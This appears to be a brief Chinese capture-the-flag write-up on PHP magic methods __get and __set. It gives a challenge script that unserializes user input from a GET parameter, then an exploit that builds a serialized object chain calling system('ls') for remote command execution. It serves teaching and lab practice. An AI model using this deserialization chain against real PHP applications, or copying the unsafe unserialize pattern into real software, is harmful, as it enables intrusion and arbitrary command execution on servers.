- 从一个难以访问的属性读取数据的时候 __get() 方法被调用
- 向一个难以访问的属性赋值的时候 __set() 方法被调用
- 难以访问包括:(1)私有属性,(2)没有初始化的属性
两个用实例,简洁的描述了这两个魔术方法的链接 https://www.php.cn/php-weizijiaocheng-450007.html https://www.cnblogs.com/jiqing9006/p/5411403.html 题目
<?php
highlight_file(__FILE__);
class Fake{
public $firm;
public $test;
public function __set($firm,$test){
$test = "No,You can't";
$firm = unserialize($firm);
call_user_func($firm,$test);
}
}
class Temp{
public $pri;
public $fin=1;
public function __destruct()
{
$a=$this->action;
$this->pri->$a = $this->fin;
}
}
class OwO{
public $fc;
public $args;
function run()
{
return ($this->fc)($this->args);
}
}
$d = $_GET['poc'];
unserialize($d);
?>
思路啥都比较简单,就不写了
<?php
class Fake{
public $firm;
public $test;
}
class Temp{
public $pri;
public $fin=1;
}
class OwO{
public $fc="system";
public $args="ls";
}
$b=new Fake();
$a=new Temp();
$a->pri=$b;
$a->action=serialize(array(new OwO,"run"));
echo serialize($a);
|